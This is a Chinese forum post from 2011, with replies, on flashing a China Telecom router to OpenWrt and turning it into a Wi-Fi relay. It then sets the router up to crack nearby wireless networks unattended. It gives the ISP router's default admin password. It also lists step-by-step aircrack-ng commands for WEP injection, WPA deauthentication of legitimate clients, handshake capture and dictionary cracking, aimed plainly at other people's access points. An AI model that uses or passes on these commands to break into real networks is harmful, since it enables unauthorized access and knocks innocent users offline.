路由器挂瑞银万能中继,路由器抓包,路由器跑包详细说明!
本帖最后由 qq121047664 于 2011-11-19 12:25 编辑论坛的帐号已经注册了4年了,发现很多刚注册的朋友等级都跑到我前边了,因为长期潜水:lol。今天 发个有实际用到的东西希望朋友们可以支持。
这是我的装备一共有三套,
电信的路由猫+平板+瑞银网卡(图中的是卡X由于瑞银在服役不好拆下拍照)=80元,便宜吧!
路由器是带两个USB口的,路由什么型号我就不说自己去找不做广告,网卡就接在路由USB口上,也可以用USB HUB再扩展理论上可以接无数个(我挂的是三个),需要外接电源。注意路由并不是只有这款才能支持,有很多型都可以用自己找。
先说路由刷机:
路由自带的是电信版的固件,我们需要刷好新的openwrt(官网也可以下载,民间高人编译的里边加了很多软件比较实用)这是固件我用了觉得还不错。
刷机(刷机前请先将USB网卡接到路由器上):找个牙签之类的东西,在路由的SYS这个小孔上按住然后开电源等待20秒左右松开牙签。装网线接在靠电源这边的网口上,电脑IP为:192.168.1.100,在IE地址栏打上192.168.1.1,会出现在一个页面需要输入密码
(用户:telecomadmin 密码:nE7jA%5m),如果没有你需要重来牙签部分。
登陆之后点击浏览,选中上边的固件,再点升级,等待5分钟,这时IE有时会出现无法显示不用去管它,在这期间电脑和路由都不能断电网线也不能拔,否则路由就变砖头了。
重启之后(重启需要两分钟)将网线换到lan1或者lan2网口上,IE地址栏输入192.168.1.1,登陆(用户名root密码admin)
路由系统 设置:
点击-
1——————————————————————————————————————————————————————————————
2——————————————————————————————————————————————————————————————
3——————————————————————————————————————————————————————————————
4——————————————————————————————————————————————————————————————
重启好了之后,再次登入路由系统,先点击网络--
点击接口
-----------------
-------------------
——————————————————————————————————————————
接下来
然后再在这个界面点击--无线
————————————————————————————
这也是我使用中的中继下边是要中继的路由,上边的是发射给我的
____----------------------
接下来再点击radio1的扫描按钮,这是我这边的扫描到的网络
--------------------------------------============
点击上方的,并在弹出的页面点击,系统 会自动配置,需要要等待3分钟,由于路由系统的网关已经设置了需要把电脑的IP和网关都改一下,自动获取也可以。现在可以摘下网线用电脑的无线连接 网络了。
===========================================
=============================================
接下来是路由器怎么抓包了。
和BT3一样WEP一定可以POJIE,WPA需要抓包,
需要用到这两个工具,
先要路由连接网络,打开putty,按照这个配置
点击打开,
回车后输入以下代码(代码的意思自己百度一两句话说不清,照做就可以)按回车:
opkg update
opkg install aircrack-ng
opkg install screen
等待安装完成,大概2分钟,有时候会装不上,为保险输入两次吧!多按两次回车。
------------------------------------------------------------------------
安装完成再输入:screen
查看网上信息:
iwlist wlan1 scanning
扫描信号
:
airmon-ng start mon.wlan1
(每一行为一段代码,输入完成后要回车的。)
启动mon:
(精确 monitor 为11频道。
也就是创建 mon0 可以用airmon-ng stop mon0 关闭)
airmon-ng start wlan1
查看在线AP抓包
开始抓包
在这里会显示扫描到的AP 从这里选择要PJ的AP SSID、MAC地址等信息
airodump-ng -w name mon0
下图是抓包,这个大家应该熟悉的.
很说WEP的
airodump-ng -c (要抓的信道) --bssid (这里是要抓的MAC) -w name-01.ivs mon0
上边相互间是有空格的,
新建一个PUTTY窗口
aireplay-ng -1 0 -a AP'sMAC -h MyMAC mon0
(AP'sMAC是要PJAP的MAC地址 -h后面跟着的MyMAC是自己的无线网卡的MAC地址 )
进行注入
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP'sMAC -h MyMAC mon0
成功建立虚拟连接后输入:
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP'sMAC
-h MyMAC mon
======================================
到wpa了
新建PUTTY,
输入:screen
airodump-ng -c (信道) --bssid (AP Mac) -w output mon0(抓cap包)
airodump-ng -c (信道) --bssid (AP Mac) -w /mnt/sda1/output mon0(抓cap包放在U盘,U盘直接插上路由系统会自动加载)
airodump-ng -c (信道) --bssid (AP Mac) --ivs -w output mon0 (抓ivs包) 两种包都可以
aireplay-ng -0 1 -a (AP Mac) -c (合法的客户端) mon0往已经连接到ap的一个客户端伪造一个离线包,使其离线重连以便捕捉handshake.注意要收到ACK,才表明被攻击客户端收到,才会下线;发送离线不宜过密过多。
监听捕捉另外一客户端与ap之间的连接,上方出现WPA handshake: xx:xx:xx:xx........为成功获得握手包也可以使用发下命令来测试是否有握手包,
aircrack-ng -w /mnt/sda1/password.TXT -b AP Mac
/mnt/sda1/
output*.cap (
password.TXT是字典)
这时你可以关掉窗口了,关掉电脑了,路由器会自己抓包,跑包了。
平时路由器都是7X24小时的开着的功耗才几瓦,反正也是开着,倒不如合理利用一举两得。
============================================
screen 使用
screen -ls '显示screen列表
screen -r id '进入会话
(id编号)
这是用到的两个命令,新建PUTTY,登陆后直接输入:screen -ls 就会看到你正在跑包的程序编号。。screen -r id '进入会话
(id是编号)
这样就可以看到跑包的进度了。
有什么需要帮忙的回帖留言,能力范围内帮你解决!累了明天再发,怎么把多个无线叠加在一起达到高速上网。
这是电子档临时做的
好棒的帖子,我正在找这个主题,大力帮顶! 强帖啊。。呵呵。。 新手的福音啊 顶 太深奥了,领悟不到精隋。 好详细的教程,谢谢分享:handshake 大大力顶:lol 太深奥了,领悟不到精隋。 回复 1# qq121047664
RE: 路由器万能中继,路由器抓包,路由器跑包详细说明! [修改] 我正在找这个主题 太深奥了。我还是头一次听路由PJ 希望楼主做个电子文档我们好收藏。。。。。:P:P:P